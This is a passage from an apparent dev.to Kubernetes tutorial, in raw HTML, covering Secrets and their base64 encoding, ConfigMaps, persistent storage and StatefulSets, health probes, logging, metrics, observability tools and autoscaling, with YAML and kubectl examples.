&lt;li&gt;By default, Secrets are &lt;strong&gt;not encrypted at rest&lt;/strong&gt; in etcd. You can enable encryption at rest in the API server configuration, but it requires explicit setup.&lt;/li&gt;
&lt;li&gt;All communication between your app and the API server is over TLS.&lt;/li&gt;
&lt;li&gt;Access to Secrets is controlled by RBAC — only authorized service accounts and users can read them.
&lt;/li&gt;
&lt;/ul&gt;
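The "encoding, not encryption" point is easy to demonstrate: anyone can reverse base64 with the standard library, no key involved.

```python
import base64

# The DB_PASSWORD value from the Secret manifest decodes trivially:
encoded = "cGFzc3dvcmQxMjM="
print(base64.b64decode(encoded).decode("utf-8"))  # password123

# Encoding a value for a Secret manifest is just as trivial:
print(base64.b64encode(b"supersecret").decode("ascii"))  # c3VwZXJzZWNyZXQ=
```

This is why etcd access and RBAC, not the base64 layer, are what actually protect Secret values.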

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# secret.yaml&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Secret&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;app-secrets&lt;/span&gt;
&lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Opaque&lt;/span&gt;
&lt;span class="na"&gt;data&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;DB_PASSWORD&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;cGFzc3dvcmQxMjM=&lt;/span&gt;    &lt;span class="c1"&gt;# base64 of "password123"&lt;/span&gt;
  &lt;span class="na"&gt;API_KEY&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;c3VwZXJzZWNyZXQ=&lt;/span&gt;        &lt;span class="c1"&gt;# base64 of "supersecret"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Create a secret without manually base64-encoding&lt;/span&gt;
kubectl create secret generic app-secrets &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--from-literal&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nv"&gt;DB_PASSWORD&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;password123 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--from-literal&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nv"&gt;API_KEY&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;supersecret

&lt;span class="c"&gt;# Values are hidden in describe output&lt;/span&gt;
kubectl get secrets
kubectl describe secret app-secrets
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Exercise 9: ConfigMap in Practice
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;kubectl apply &lt;span class="nt"&gt;-f&lt;/span&gt; configmap.yaml

kubectl get configmap app-config
kubectl describe configmap app-config

&lt;span class="c"&gt;# Edit the ConfigMap live&lt;/span&gt;
kubectl edit configmap app-config
&lt;span class="c"&gt;# (Volume-mounted Pods will pick up the change after a short delay;&lt;/span&gt;
&lt;span class="c"&gt;#  env-var Pods will NOT until they restart)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Production secret management:&lt;/strong&gt; For real workloads, look into &lt;a href="https://www.vaultproject.io/" rel="noopener noreferrer"&gt;HashiCorp Vault&lt;/a&gt;, &lt;a href="https://github.com/bitnami-labs/sealed-secrets" rel="noopener noreferrer"&gt;Sealed Secrets&lt;/a&gt;, or &lt;a href="https://external-secrets.io/" rel="noopener noreferrer"&gt;External Secrets Operator&lt;/a&gt; — these provide proper secret lifecycle management, rotation, and audit trails.&lt;/p&gt;
&lt;/blockquote&gt;





&lt;h2&gt;
  
  
  Part 8 — Storage: Keeping Data Alive
&lt;/h2&gt;

&lt;h3&gt;
  
  
  The Ephemeral Problem
&lt;/h3&gt;

&lt;p&gt;When a Pod dies, everything written to its container filesystem is gone. For stateless apps (web servers, APIs), that's fine. For databases, that's catastrophic.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjkcr69wk3gfte3rslfqt.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjkcr69wk3gfte3rslfqt.png" alt="image" width="800" height="681"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Storage Concepts
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Volume&lt;/strong&gt;&lt;br&gt;
Tied to a Pod's lifecycle and shared between the containers in that Pod. Types include &lt;code&gt;emptyDir&lt;/code&gt; (temporary scratch space), &lt;code&gt;hostPath&lt;/code&gt; (mounts a directory from the node), and many others. Ephemeral types like &lt;code&gt;emptyDir&lt;/code&gt; disappear when the Pod does.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;PersistentVolume (PV)&lt;/strong&gt;&lt;br&gt;
A piece of storage provisioned in the cluster — either manually by an admin or automatically (dynamically). Lives independently of any Pod.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;PersistentVolumeClaim (PVC)&lt;/strong&gt;&lt;br&gt;
A user's &lt;em&gt;request&lt;/em&gt; for storage. Specifies size, access mode, and optionally a StorageClass. Kubernetes binds a PVC to a matching PV.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;StorageClass&lt;/strong&gt;&lt;br&gt;
Defines the &lt;em&gt;type&lt;/em&gt; and &lt;em&gt;provisioner&lt;/em&gt; of storage (e.g., SSD vs HDD, local vs cloud block storage). Enables &lt;strong&gt;dynamic provisioning&lt;/strong&gt; — when you create a PVC, the StorageClass automatically creates a PV to satisfy it.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fy5wlhmg4hsw9tuh6dtes.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fy5wlhmg4hsw9tuh6dtes.png" alt="image" width="800" height="145"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h3&gt;
  
  
  PVC Example
&lt;/h3&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# pvc.yaml&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;PersistentVolumeClaim&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;my-data&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;accessModes&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;ReadWriteOnce&lt;/span&gt;           &lt;span class="c1"&gt;# One node can read/write at a time&lt;/span&gt;
  &lt;span class="na"&gt;resources&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;requests&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;storage&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;1Gi&lt;/span&gt;
  &lt;span class="c1"&gt;# No storageClassName specified = uses the cluster default&lt;/span&gt;
  &lt;span class="c1"&gt;# Check available classes with: kubectl get storageclass&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Use PVC in a Pod&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;containers&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;my-db&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;postgres:15&lt;/span&gt;
    &lt;span class="na"&gt;volumeMounts&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;mountPath&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;/var/lib/postgresql/data"&lt;/span&gt;
      &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;db-storage&lt;/span&gt;
  &lt;span class="na"&gt;volumes&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;db-storage&lt;/span&gt;
    &lt;span class="na"&gt;persistentVolumeClaim&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;claimName&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;my-data&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;h3&gt;
  
  
  Exercise 10: PVC with minikube
&lt;/h3&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Check what StorageClasses are available in your cluster&lt;/span&gt;
kubectl get storageclass

&lt;span class="c"&gt;# Create the PVC&lt;/span&gt;
kubectl apply &lt;span class="nt"&gt;-f&lt;/span&gt; pvc.yaml

&lt;span class="c"&gt;# Verify it bound to a PV&lt;/span&gt;
kubectl get pvc
&lt;span class="c"&gt;# STATUS should be: Bound&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;h3&gt;
  
  
  StatefulSets: For Databases and Stateful Apps
&lt;/h3&gt;

&lt;p&gt;For databases and other stateful applications, use a &lt;strong&gt;StatefulSet&lt;/strong&gt; instead of a Deployment. StatefulSets provide guarantees that Deployments don't:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Stable, unique Pod names&lt;/strong&gt; (pod-0, pod-1, pod-2 — never random suffixes)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Stable network identities&lt;/strong&gt; (each Pod gets its own DNS hostname)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Ordered, graceful startup and shutdown&lt;/strong&gt; (pod-0 before pod-1, etc.)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This is critical for clustered databases like PostgreSQL, Cassandra, or Kafka, where each node has a distinct role and identity.&lt;/p&gt;
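&lt;p&gt;As a sketch — the &lt;code&gt;web&lt;/code&gt; name and the headless Service are illustrative, not from a specific app — a minimal StatefulSet ties stable Pod identity to per-Pod storage via &lt;code&gt;volumeClaimTemplates&lt;/code&gt;:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;apiVersion: apps/v1
kind: StatefulSet
metadata:
  name: web
spec:
  serviceName: web-headless   # headless Service that gives each Pod its own DNS name
  replicas: 3                 # creates web-0, web-1, web-2 in order
  selector:
    matchLabels:
      app: web
  template:
    metadata:
      labels:
        app: web
    spec:
      containers:
      - name: web
        image: nginx
        volumeMounts:
        - name: data
          mountPath: /usr/share/nginx/html
  volumeClaimTemplates:       # one PVC per Pod, retained across restarts
  - metadata:
      name: data
    spec:
      accessModes: ["ReadWriteOnce"]
      resources:
        requests:
          storage: 1Gi
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Note that each replica gets its &lt;em&gt;own&lt;/em&gt; PVC (&lt;code&gt;data-web-0&lt;/code&gt;, &lt;code&gt;data-web-1&lt;/code&gt;, ...), unlike a Deployment where all replicas would share one claim.&lt;/p&gt;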



&lt;h2&gt;
  
  
  Part 9 — Observability: Knowing What's Going On
&lt;/h2&gt;
&lt;h3&gt;
  
  
  The Three Pillars of Observability
&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqftziw5npcz5d7qdh9b6.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqftziw5npcz5d7qdh9b6.png" alt="image" width="800" height="200"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Kubernetes provides primitives for all three, but a full observability stack requires additional tooling.&lt;/p&gt;
&lt;h3&gt;
  
  
  Logs
&lt;/h3&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Basic logs&lt;/span&gt;
kubectl logs &amp;lt;pod-name&amp;gt;

&lt;span class="c"&gt;# Follow logs in real time&lt;/span&gt;
kubectl logs &lt;span class="nt"&gt;-f&lt;/span&gt; &amp;lt;pod-name&amp;gt;

&lt;span class="c"&gt;# Logs from a specific container in a multi-container Pod&lt;/span&gt;
kubectl logs &amp;lt;pod-name&amp;gt; &lt;span class="nt"&gt;-c&lt;/span&gt; &amp;lt;container-name&amp;gt;

&lt;span class="c"&gt;# Logs from the previous (crashed) container instance&lt;/span&gt;
kubectl logs &amp;lt;pod-name&amp;gt; &lt;span class="nt"&gt;--previous&lt;/span&gt;

&lt;span class="c"&gt;# Logs from all pods matching a label (requires kubectl 1.14+)&lt;/span&gt;
kubectl logs &lt;span class="nt"&gt;-l&lt;/span&gt; &lt;span class="nv"&gt;app&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;my-app &lt;span class="nt"&gt;--all-containers&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nb"&gt;true&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;h3&gt;
  
  
  Events
&lt;/h3&gt;

&lt;p&gt;Events record what happened to your resources and why — scheduling decisions, image pulls, probe failures. They're often the fastest route to a root cause when debugging:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# All recent events, sorted by time&lt;/span&gt;
kubectl get events &lt;span class="nt"&gt;--sort-by&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;.metadata.creationTimestamp

&lt;span class="c"&gt;# Events for a specific resource (look at the Events section at the bottom)&lt;/span&gt;
kubectl describe pod &amp;lt;pod-name&amp;gt;
kubectl describe deployment my-app
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Health Checks (Probes)
&lt;/h3&gt;

&lt;p&gt;Kubernetes has three built-in health check mechanisms. Configuring these correctly is one of the most impactful things you can do for reliability:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Liveness Probe&lt;/strong&gt; — Is the container alive? If it fails, kubelet restarts the container.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Readiness Probe&lt;/strong&gt; — Is the container ready to receive traffic? If it fails, the Pod is removed from Service endpoints (traffic stops going to it) but it is &lt;em&gt;not&lt;/em&gt; restarted.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Startup Probe&lt;/strong&gt; — For slow-starting apps. Disables liveness and readiness checks until the startup probe succeeds, giving the app time to initialize.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;containers&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;my-app&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;nginx&lt;/span&gt;
    &lt;span class="na"&gt;startupProbe&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;httpGet&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;path&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/healthz&lt;/span&gt;
        &lt;span class="na"&gt;port&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;80&lt;/span&gt;
      &lt;span class="na"&gt;failureThreshold&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;30&lt;/span&gt;     &lt;span class="c1"&gt;# Give up to 30 * 10s = 5 minutes to start&lt;/span&gt;
      &lt;span class="na"&gt;periodSeconds&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;10&lt;/span&gt;
    &lt;span class="na"&gt;livenessProbe&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;httpGet&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;path&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/healthz&lt;/span&gt;
        &lt;span class="na"&gt;port&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;80&lt;/span&gt;
      &lt;span class="na"&gt;initialDelaySeconds&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;10&lt;/span&gt;
      &lt;span class="na"&gt;periodSeconds&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;5&lt;/span&gt;
    &lt;span class="na"&gt;readinessProbe&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;httpGet&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;path&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/ready&lt;/span&gt;
        &lt;span class="na"&gt;port&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;80&lt;/span&gt;
      &lt;span class="na"&gt;initialDelaySeconds&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;5&lt;/span&gt;
      &lt;span class="na"&gt;periodSeconds&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;3&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Resource Metrics
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Enable metrics-server (minikube only)&lt;/span&gt;
minikube addons &lt;span class="nb"&gt;enable &lt;/span&gt;metrics-server

&lt;span class="c"&gt;# View CPU and memory usage&lt;/span&gt;
kubectl top nodes
kubectl top pods
kubectl top pods &lt;span class="nt"&gt;--sort-by&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;memory   &lt;span class="c"&gt;# Sort by memory usage&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Popular Observability Tools
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Tool&lt;/th&gt;
&lt;th&gt;Purpose&lt;/th&gt;
&lt;th&gt;Link&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Prometheus&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Metrics collection and alerting rules&lt;/td&gt;
&lt;td&gt;&lt;a href="https://prometheus.io/" rel="noopener noreferrer"&gt;prometheus.io&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Grafana&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Dashboards and visualization&lt;/td&gt;
&lt;td&gt;&lt;a href="https://grafana.com/" rel="noopener noreferrer"&gt;grafana.com&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Loki&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Log aggregation (Grafana's log tool)&lt;/td&gt;
&lt;td&gt;&lt;a href="https://grafana.com/oss/loki/" rel="noopener noreferrer"&gt;grafana.com/oss/loki&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Jaeger&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Distributed tracing&lt;/td&gt;
&lt;td&gt;&lt;a href="https://www.jaegertracing.io/" rel="noopener noreferrer"&gt;jaegertracing.io&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;k9s&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Terminal UI for Kubernetes&lt;/td&gt;
&lt;td&gt;&lt;a href="https://k9scli.io/" rel="noopener noreferrer"&gt;k9scli.io&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Lens&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Desktop GUI for Kubernetes&lt;/td&gt;
&lt;td&gt;&lt;a href="https://k8slens.dev/" rel="noopener noreferrer"&gt;k8slens.dev&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;blockquote&gt;
&lt;p&gt;💡 &lt;strong&gt;Start with k9s immediately.&lt;/strong&gt; It's a terminal dashboard that makes navigating pods, logs, and events dramatically faster than typing raw kubectl commands. Install it and never look back.&lt;/p&gt;
&lt;/blockquote&gt;





&lt;h2&gt;
  
  
  Part 10 — Putting It All Together: The Big Picture
&lt;/h2&gt;

&lt;h3&gt;
  
  
  A Real-World Application Architecture
&lt;/h3&gt;

&lt;p&gt;Let's see how all the pieces interact in a typical production-style web application:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmgm7kvbzq96gw0uksa7n.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmgm7kvbzq96gw0uksa7n.png" alt="image" width="800" height="501"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  The Kubernetes Development Workflow
&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fw4hfpndjv5fp1df0mdu8.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fw4hfpndjv5fp1df0mdu8.png" alt="image" width="800" height="74"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Key Concepts Recap
&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Feadta2jkhg4o1vz0s9q6.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Feadta2jkhg4o1vz0s9q6.png" alt="image" width="800" height="343"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  What We Haven't Covered (But You Should Know Exists)
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Helm&lt;/strong&gt; — The package manager for Kubernetes. Instead of managing raw YAML, Helm lets you install pre-packaged applications called &lt;em&gt;charts&lt;/em&gt; with version management and templating. &lt;a href="https://helm.sh/" rel="noopener noreferrer"&gt;helm.sh&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;RBAC (Role-Based Access Control)&lt;/strong&gt; — Controls who (users, service accounts) can do what (get, create, delete) on which resources. Essential for multi-team clusters.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;NetworkPolicy&lt;/strong&gt; — Firewall rules for Pod-to-Pod communication. By default all Pods can talk to each other; NetworkPolicies let you restrict this.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;DaemonSet&lt;/strong&gt; — Ensures a Pod runs on &lt;em&gt;every&lt;/em&gt; node in the cluster. Used for node-level tools like log collectors, monitoring agents, and network plugins.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Job / CronJob&lt;/strong&gt; — Run one-off or scheduled tasks. A Job runs to completion; a CronJob runs on a schedule (like cron).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Horizontal Pod Autoscaler (HPA)&lt;/strong&gt; — Automatically scales a Deployment's replica count based on CPU/memory metrics or custom metrics.&lt;/p&gt;
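&lt;p&gt;A minimal &lt;code&gt;autoscaling/v2&lt;/code&gt; manifest — the &lt;code&gt;my-app&lt;/code&gt; names are placeholders — looks something like this, scaling between 2 and 10 replicas to hold average CPU at 70%:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;apiVersion: autoscaling/v2
kind: HorizontalPodAutoscaler
metadata:
  name: my-app
spec:
  scaleTargetRef:            # the workload to scale
    apiVersion: apps/v1
    kind: Deployment
    name: my-app
  minReplicas: 2
  maxReplicas: 10
  metrics:
  - type: Resource
    resource:
      name: cpu
      target:
        type: Utilization
        averageUtilization: 70
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;CPU utilization here is measured against the container's &lt;code&gt;resources.requests&lt;/code&gt;, which is another reason to always set requests.&lt;/p&gt;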

&lt;p&gt;&lt;strong&gt;Operators&lt;/strong&gt; — Custom controllers that encode operational knowledge about complex applications (e.g., how to set up a Postgres cluster, handle failover, run backups). &lt;a href="https://operatorhub.io/" rel="noopener noreferrer"&gt;operatorhub.io&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Service Mesh (Istio, Linkerd)&lt;/strong&gt; — Infrastructure layer for advanced traffic management, mutual TLS between services, and deep observability without touching app code.&lt;/p&gt;

